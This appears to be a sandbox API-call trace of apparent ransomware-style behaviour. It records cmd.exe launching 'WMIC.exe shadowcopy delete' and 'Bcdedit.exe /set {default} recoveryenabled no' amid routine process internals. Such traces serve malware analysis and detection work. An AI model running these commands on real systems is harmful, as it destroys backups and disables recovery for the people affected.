GetLastError () returned 0x2 [0041.157] FindFirstFileExW (in: lpFileName="C:\\Windows\\WMIC.exe.*", fInfoLevelId=0x1, lpFindFileData=0x16f150, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16f150) returned 0xffffffffffffffff [0041.157] GetLastError () returned 0x2 [0041.157] FindFirstFileExW (in: lpFileName="C:\\Windows\\WMIC.exe", fInfoLevelId=0x1, lpFindFileData=0x16f150, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16f150) returned 0xffffffffffffffff [0041.157] GetLastError () returned 0x2 [0041.157] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0041.157] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.exe", fInfoLevelId=0x1, lpFindFileData=0x16f150, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16f150) returned 0x34c100 [0041.157] GetProcessHeap () returned 0x330000 [0041.157] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x0, Size=0x28) returned 0x344610 [0041.157] FindClose (in: hFindFile=0x34c100 | out: hFindFile=0x34c100) returned 1 [0041.157] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0041.157] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0041.157] GetConsoleTitleW (in: lpConsoleTitle=0x16f6a0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0041.157] InitializeProcThreadAttributeList (in: lpAttributeList=0x16f458, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x16f418 | out: lpAttributeList=0x16f458, lpSize=0x16f418) returned 1 [0041.157] UpdateProcThreadAttribute (in: lpAttributeList=0x16f458, dwFlags=0x0, Attribute=0x60001, lpValue=0x16f408, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x16f458, lpPreviousValue=0x0) returned 1 [0041.158] GetStartupInfoW (in: lpStartupInfo=0x16f570 | out: lpStartupInfo=0x16f570*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0041.158] GetProcessHeap () returned 0x330000 [0041.158] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x20) returned 0x344640 [0041.158] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0041.158] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0041.158] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0041.158] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0041.158] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0041.158] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0041.158] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0041.158] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0041.158] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0041.158] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0041.158] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0041.158] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0041.158] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0041.158] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0041.158] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0041.158] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0041.158] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0041.158] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0041.158] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0041.158] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0041.158] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0041.158] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0041.158] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0041.158] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0041.158] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0041.158] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0041.158] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0041.158] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0041.158] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0041.158] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0041.158] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0041.158] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0041.158] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0041.159] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0041.159] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0041.159] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0041.159] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0041.159] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0041.159] GetProcessHeap () returned 0x330000 [0041.159] HeapFree (in: hHeap=0x330000, dwFlags=0x0, lpMem=0x344640 | out: hHeap=0x330000) returned 1 [0041.159] GetProcessHeap () returned 0x330000 [0041.159] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x12) returned 0x34c100 [0041.159] lstrcmpW (lpString1="\\WMIC.exe", lpString2="\\XCOPY.EXE") returned -1 [0041.160] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\Wbem\\WMIC.exe", lpCommandLine="WMIC.exe shadowcopy delete ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x16f490*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="WMIC.exe shadowcopy delete ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x16f440 | out: lpCommandLine="WMIC.exe shadowcopy delete ", lpProcessInformation=0x16f440*(hProcess=0x54, hThread=0x50, dwProcessId=0xb50, dwThreadId=0xb54)) returned 1 [0041.169] CloseHandle (hObject=0x50) returned 1 [0041.170] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0041.170] GetProcessHeap () returned 0x330000 [0041.170] HeapFree (in: hHeap=0x330000, dwFlags=0x0, lpMem=0x34acc0 | out: hHeap=0x330000) returned 1 [0041.170] GetEnvironmentStringsW () returned 0x34acc0* [0041.170] GetProcessHeap () returned 0x330000 [0041.170] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0xae8) returned 0x348af0 [0041.170] FreeEnvironmentStringsW (penv=0x34acc0) returned 1 [0041.170] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0077.660] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x16f388 | out: lpExitCode=0x16f388*=0x0) returned 1 [0077.660] CloseHandle (hObject=0x54) returned 1 [0077.660] _vsnwprintf (in: _Buffer=0x16f5f8, _BufferCount=0x13, _Format="%08X", _ArgList=0x16f398 | out: _Buffer="00000000") returned 8 [0077.660] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0077.660] GetProcessHeap () returned 0x330000 [0077.661] HeapFree (in: hHeap=0x330000, dwFlags=0x0, lpMem=0x348af0 | out: hHeap=0x330000) returned 1 [0077.661] GetEnvironmentStringsW () returned 0x34c120* [0077.661] GetProcessHeap () returned 0x330000 [0077.661] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0xb0e) returned 0x348af0 [0077.661] FreeEnvironmentStringsW (penv=0x34c120) returned 1 [0077.661] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0077.661] GetProcessHeap () returned 0x330000 [0077.661] HeapFree (in: hHeap=0x330000, dwFlags=0x0, lpMem=0x348af0 | out: hHeap=0x330000) returned 1 [0077.661] GetEnvironmentStringsW () returned 0x34c120* [0077.661] GetProcessHeap () returned 0x330000 [0077.661] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0xb0e) returned 0x348af0 [0077.661] FreeEnvironmentStringsW (penv=0x34c120) returned 1 [0077.661] GetProcessHeap () returned 0x330000 [0077.661] HeapFree (in: hHeap=0x330000, dwFlags=0x0, lpMem=0x34c100 | out: hHeap=0x330000) returned 1 [0077.661] DeleteProcThreadAttributeList (in: lpAttributeList=0x16f458 | out: lpAttributeList=0x16f458) [0077.661] _get_osfhandle (_FileHandle=1) returned 0x7 [0077.661] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0077.661] _get_osfhandle (_FileHandle=1) returned 0x7 [0077.661] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4ac7e194 | out: lpMode=0x4ac7e194) returned 1 [0077.661] _get_osfhandle (_FileHandle=0) returned 0x3 [0077.661] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ac7e198 | out: lpMode=0x4ac7e198) returned 1 [0077.662] SetConsoleInputExeNameW () returned 0x1 [0077.662] GetConsoleOutputCP () returned 0x1b5 [0077.662] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac8bfe0 | out: lpCPInfo=0x4ac8bfe0) returned 1 [0077.662] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0077.662] exit (_Code=0) Process: id = "4" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x49cd8000" os_pid = "0xb2c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa44" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C Bcdedit.exe /set {default} recoveryenabled no" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 13 os_tid = 0xb30 [0041.610] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2bfb00 | out: lpSystemTimeAsFileTime=0x2bfb00*(dwLowDateTime=0x1ea3f60, dwHighDateTime=0x1d53bb2)) [0041.610] GetCurrentProcessId () returned 0xb2c [0041.610] GetCurrentThreadId () returned 0xb30 [0041.610] GetTickCount () returned 0x19fa8 [0041.610] QueryPerformanceCounter (in: lpPerformanceCount=0x2bfb08 | out: lpPerformanceCount=0x2bfb08*=16187889568) returned 1 [0041.611] GetModuleHandleW (lpModuleName=0x0) returned 0x4ac50000 [0041.611] __set_app_type (_Type=0x1) [0041.611] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4ac77810) returned 0x0 [0041.611] __getmainargs (in: _Argc=0x4ac9a608, _Argv=0x4ac9a618, _Env=0x4ac9a610, _DoWildCard=0, _StartInfo=0x4ac7e0f4 | out: _Argc=0x4ac9a608, _Argv=0x4ac9a618, _Env=0x4ac9a610) returned 0 [0041.611] GetCurrentThreadId () returned 0xb30 [0041.611] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb30) returned 0x3c [0041.611] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e30000 [0041.612] GetProcAddress (hModule=0x76e30000, lpProcName="SetThreadUILanguage") returned 0x76e46d40 [0041.612] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0041.612] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0041.612] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2bfa98 | out: phkResult=0x2bfa98*=0x0) returned 0x2 [0041.612] VirtualQuery (in: lpAddress=0x2bfa80, lpBuffer=0x2bfa00, dwLength=0x30 | out: lpBuffer=0x2bfa00*(BaseAddress=0x2bf000, AllocationBase=0x1c0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0041.612] VirtualQuery (in: lpAddress=0x1c0000, lpBuffer=0x2bfa00, dwLength=0x30 | out: lpBuffer=0x2bfa00*(BaseAddress=0x1c0000, AllocationBase=0x1c0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0041.612] VirtualQuery (in: lpAddress=0x1c1000, lpBuffer=0x2bfa00, dwLength=0x30 | out: lpBuffer=0x2bfa00*(BaseAddress=0x1c1000, AllocationBase=0x1c0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0041.612] VirtualQuery (in: lpAddress=0x1c4000, lpBuffer=0x2bfa00, dwLength=0x30 | out: lpBuffer=0x2bfa00*(BaseAddress=0x1c4000, AllocationBase=0x1c0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0041.612] VirtualQuery (in: lpAddress=0x2c0000, lpBuffer=0x2bfa00, dwLength=0x30 | out: lpBuffer=0x2bfa00*(BaseAddress=0x2c0000, AllocationBase=0x2c0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xe000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0041.612] GetConsoleOutputCP () returned 0x1b5 [0041.612] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac8bfe0 | out: lpCPInfo=0x4ac8bfe0) returned 1 [0041.613] SetConsoleCtrlHandler (HandlerRoutine=0x4ac73184, Add=1) returned 1 [0041.613] _get_osfhandle (_FileHandle=1) returned 0x7 [0041.613] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0041.613] _get_osfhandle (_FileHandle=1) returned 0x7 [0041.613] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4ac7e194 | out: lpMode=0x4ac7e194) returned 1 [0041.613] _get_osfhandle (_FileHandle=1) returned 0x7 [0041.613] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0041.613] _get_osfhandle (_FileHandle=0) returned 0x3 [0041.613] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ac7e198 | out: lpMode=0x4ac7e198) returned 1 [0041.614] _get_osfhandle (_FileHandle=0) returned 0x3 [0041.614] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0041.614] GetEnvironmentStringsW () returned 0x448b00* [0041.614] GetProcessHeap () returned 0x430000 [0041.614] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xa7c) returned 0x449590 [0041.614] FreeEnvironmentStringsW (penv=0x448b00) returned 1 [0041.614] GetProcessHeap () returned 0x430000 [0041.614] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x8) returned 0x448980 [0041.614] GetEnvironmentStringsW () returned 0x448b00* [0041.614] GetProcessHeap () returned 0x430000 [0041.614] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xa7c) returned 0x44a020 [0041.614] FreeEnvironmentStringsW (penv=0x448b00) returned 1 [0041.614] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2be958 | out: phkResult=0x2be958*=0x44) returned 0x0 [0041.614] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2be950, lpData=0x2be970, lpcbData=0x2be954*=0x1000 | out: lpType=0x2be950*=0x0, lpData=0x2be970*=0x18, lpcbData=0x2be954*=0x1000) returned 0x2 [0041.614] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2be950, lpData=0x2be970, lpcbData=0x2be954*=0x1000 | out: lpType=0x2be950*=0x4, lpData=0x2be970*=0x1, lpcbData=0x2be954*=0x4) returned 0x0 [0041.614] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2be950, lpData=0x2be970, lpcbData=0x2be954*=0x1000 | out: lpType=0x2be950*=0x0, lpData=0x2be970*=0x1, lpcbData=0x2be954*=0x1000) returned 0x2 [0041.614] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2be950, lpData=0x2be970, lpcbData=0x2be954*=0x1000 | out: lpType=0x2be950*=0x4, lpData=0x2be970*=0x0, lpcbData=0x2be954*=0x4) returned 0x0 [0041.614] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2be950, lpData=0x2be970, lpcbData=0x2be954*=0x1000 | out: lpType=0x2be950*=0x4, lpData=0x2be970*=0x40, lpcbData=0x2be954*=0x4) returned 0x0 [0041.615] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2be950, lpData=0x2be970, lpcbData=0x2be954*=0x1000 | out: lpType=0x2be950*=0x4, lpData=0x2be970*=0x40, lpcbData=0x2be954*=0x4) returned 0x0 [0041.615] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2be950, lpData=0x2be970, lpcbData=0x2be954*=0x1000 | out: lpType=0x2be950*=0x0, lpData=0x2be970*=0x40, lpcbData=0x2be954*=0x1000) returned 0x2 [0041.615] RegCloseKey (hKey=0x44) returned 0x0 [0041.615] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2be958 | out: phkResult=0x2be958*=0x44) returned 0x0 [0041.615] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2be950, lpData=0x2be970, lpcbData=0x2be954*=0x1000 | out: lpType=0x2be950*=0x0, lpData=0x2be970*=0x40, lpcbData=0x2be954*=0x1000) returned 0x2 [0041.615] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2be950, lpData=0x2be970, lpcbData=0x2be954*=0x1000 | out: lpType=0x2be950*=0x4, lpData=0x2be970*=0x1, lpcbData=0x2be954*=0x4) returned 0x0 [0041.615] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2be950, lpData=0x2be970, lpcbData=0x2be954*=0x1000 | out: lpType=0x2be950*=0x0, lpData=0x2be970*=0x1, lpcbData=0x2be954*=0x1000) returned 0x2 [0041.615] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2be950, lpData=0x2be970, lpcbData=0x2be954*=0x1000 | out: lpType=0x2be950*=0x4, lpData=0x2be970*=0x0, lpcbData=0x2be954*=0x4) returned 0x0 [0041.615] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2be950, lpData=0x2be970, lpcbData=0x2be954*=0x1000 | out: lpType=0x2be950*=0x4, lpData=0x2be970*=0x9, lpcbData=0x2be954*=0x4) returned 0x0 [0041.615] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2be950, lpData=0x2be970, lpcbData=0x2be954*=0x1000 | out: lpType=0x2be950*=0x4, lpData=0x2be970*=0x9, lpcbData=0x2be954*=0x4) returned 0x0 [0041.615] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2be950, lpData=0x2be970, lpcbData=0x2be954*=0x1000 | out: lpType=0x2be950*=0x0, lpData=0x2be970*=0x9, lpcbData=0x2be954*=0x1000) returned 0x2 [0041.615] RegCloseKey (hKey=0x44) returned 0x0 [0041.615] time (in: timer=0x0 | out: timer=0x0) returned 0x5d2d8d4b [0041.615] srand (_Seed=0x5d2d8d4b) [0041.615] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C Bcdedit.exe /set {default} recoveryenabled no" [0041.615] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C Bcdedit.exe /set {default} recoveryenabled no" [0041.615] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ac8c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0041.615] GetProcessHeap () returned 0x430000 [0041.616] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x218) returned 0x44aab0 [0041.616] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x44aac0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0041.616] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0041.616] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0041.616] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0041.616] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0041.616] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0041.616] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0041.616] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0041.616] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0041.616] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0041.616] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0041.616] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0041.616] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0041.616] GetProcessHeap () returned 0x430000 [0041.616] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x449590 | out: hHeap=0x430000) returned 1 [0041.616] GetEnvironmentStringsW () returned 0x448b00* [0041.616] GetProcessHeap () returned 0x430000 [0041.616] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xa94) returned 0x44b770 [0041.616] FreeEnvironmentStringsW (penv=0x448b00) returned 1 [0041.616] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0041.616] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0041.617] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0041.617] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0041.617] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0041.617] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0041.617] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0041.617] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0041.617] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0041.617] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0041.617] GetProcessHeap () returned 0x430000 [0041.617] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x5c) returned 0x431320 [0041.617] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2bf760 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0041.617] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x2bf760, lpFilePart=0x2bf740 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2bf740*="Desktop") returned 0x25 [0041.617] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0041.617] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2bf470 | out: lpFindFileData=0x2bf470*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xdc0000dc, cFileName="Users", cAlternateFileName="")) returned 0x431390 [0041.617] FindClose (in: hFindFile=0x431390 | out: hFindFile=0x431390) returned 1 [0041.617] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x2bf470 | out: lpFindFileData=0x2bf470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xdc0000dc, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x431390 [0041.617] FindClose (in: hFindFile=0x431390 | out: hFindFile=0x431390) returned 1 [0041.617] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0041.617] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x2bf470 | out: lpFindFileData=0x2bf470*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf8c63880, ftLastAccessTime.dwHighDateTime=0x1d53bb1, ftLastWriteTime.dwLowDateTime=0xf8c63880, ftLastWriteTime.dwHighDateTime=0x1d53bb1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xdc0000dc, cFileName="Desktop", cAlternateFileName="")) returned 0x431390 [0041.618] FindClose (in: hFindFile=0x431390 | out: hFindFile=0x431390) returned 1 [0041.618] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0041.618] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js 